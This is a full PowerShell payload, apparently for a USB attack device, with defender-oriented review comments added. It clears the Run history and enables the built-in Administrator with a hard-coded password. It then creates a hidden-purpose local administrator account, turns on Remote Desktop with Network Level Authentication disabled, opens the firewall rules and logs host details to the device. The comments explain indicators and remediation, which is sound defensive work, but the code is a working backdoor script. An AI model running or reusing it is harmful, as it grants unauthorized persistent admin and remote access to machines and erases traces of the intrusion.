
# Review summary (defender's view): this payload looks for a volume labelled
# 'BashBunny' (presumably the storage of an attached USB attack device), enables
# the built-in Administrator account, creates a second local administrator,
# turns on Remote Desktop with Network Level Authentication switched off,
# enables the "Remote Desktop" firewall rule group, and writes a report of the
# result to that volume.
# Every state-changing call below uses -ErrorAction SilentlyContinue, so a
# failure (for example, running without elevation) produces no visible error;
# only the two RDP registry values are read back and reported.
# Triage pointers, each dependent on the host's audit configuration:
#   - Security log: 4720 (account created), 4722 (account enabled),
#     4724 (password reset attempt), 4738 (account changed),
#     4732 (member added to a local group).
#   - PowerShell script block logging (event 4104), if enabled, records this text.
#   - Registry values fDenyTSConnections and UserAuthentication, shown below.

# Vars for log
# File name is <computer name>-<timestamp>.log, so each run produces a new file.
$destFile = ("$env:COMPUTERNAME-{0:yyyy-MM-dd-HH-mm-ss}.log" -f (Get-Date))
# Resolves the mount point of the volume whose label is 'BashBunny' via WMI
# (-f abbreviates -Filter) and appends the loot\badmin folder to it.
$destPath = ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'loot\badmin')
$dest = "$destPath\$destFile"
# Vars for user stuff
$NUser = "badmin"
# Hard-coded clear-text password, used below for BOTH the built-in
# Administrator and the new account. -AsPlainText -Force only wraps the string
# in a SecureString; it does not protect the secret in the script. Because the
# value is published with the script, any host where it is accepted should be
# treated as accessible to anyone who has read it.
$Password = convertto-securestring "th!s15@planetbanna" -asplaintext -force
$Group = "Administrators"
# Clear Run history
# Deletes every value under the current user's RunMRU key (-Name *).
# NOTE(review): presumably meant to remove the command that launched this
# script; the delivery stage is not shown here, so confirm before relying on it.
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name * -ErrorAction SilentlyContinue
# Enable admin account and set pw
# The built-in Administrator is enabled and given the shared password with
# expiry turned off. An enabled built-in Administrator on a host where it is
# normally disabled is a strong indicator on its own.
Enable-LocalUser -Name Administrator -ErrorAction SilentlyContinue
Set-LocalUser -Name Administrator -PasswordNeverExpires $true -Password $Password -ErrorAction SilentlyContinue
# Create new user and make admin
# Creates local account $NUser with a non-expiring password and adds it to the
# local Administrators group. Remediation should remove the account and the
# group membership, and reset or disable the built-in Administrator as well.
New-LocalUser $NUser -Password $Password -PasswordNeverExpires -ErrorAction SilentlyContinue
Add-LocalGroupMember $Group $NUser -ErrorAction SilentlyContinue
# Enable RDP
# fDenyTSConnections = 0 allows incoming Remote Desktop connections.
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" -Value 0 -ErrorAction SilentlyContinue
# UserAuthentication = 0 turns off Network Level Authentication for RDP-Tcp
# (the log section below reports this value as "NLA disabled").
# NOTE(review): where NLA is enforced through Group Policy, the policy setting
# is expected to take precedence over this local value; confirm on the host.
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" -Value 0 -ErrorAction SilentlyContinue
# Enables all firewall rules in the "Remote Desktop" display group.
Enable-NetFirewallRule -DisplayGroup "Remote Desktop" -ErrorAction SilentlyContinue
# Log things now
# The values are read back from the registry instead of trusting the suppressed
# Set-ItemProperty calls above. If a read fails, the variable is $null, which
# does not equal 0, so "fail" is written.
$rdpenabled = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" | Select-Object -expandProperty fDenyTSConnections
If ($rdpenabled -eq 0)
{
Add-Content -Path $dest -Value "$(Get-Date -Format G) RDP enabled: success"
}
Else
{
Add-Content -Path $dest -Value "$(Get-Date -Format G) RDP enabled: fail"
}
$rdpinsecure = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" | Select-Object -expandProperty UserAuthentication
If ($rdpinsecure -eq 0)
{
Add-Content -Path $dest -Value "$(Get-Date -Format G) NLA disabled: success"
}
Else
{
Add-Content -Path $dest -Value "$(Get-Date -Format G) NLA disabled: fail"
}
# The remaining lines append host inventory to the same file: the state of the
# Remote Desktop firewall rules, the full local user list, and the output of
# ipconfig /all. The account creation and group membership are not verified
# separately; they can only be inferred from the Get-LocalUser listing.
Add-Content -Path $dest -Value "$(Get-Date -Format G) RDP group firewall rules status:"
Get-NetFirewallRule -DisplayGroup "Remote Desktop" | Select-Object DisplayName, Enabled | Out-File -Append -FilePath $dest -Encoding ASCII
Add-Content -Path $dest -Value "$(Get-Date -Format G) Local users:"
Get-LocalUser | Out-File -Append -FilePath $dest -Encoding ASCII
Add-Content -Path $dest -Value "$(Get-Date -Format G) IP Config /all"
& ipconfig /all | Out-File -Append -FilePath $dest -Encoding ASCII
Add-Content -Path $dest -Value ""
Add-Content -Path $dest -Value "Have a nice day ;)"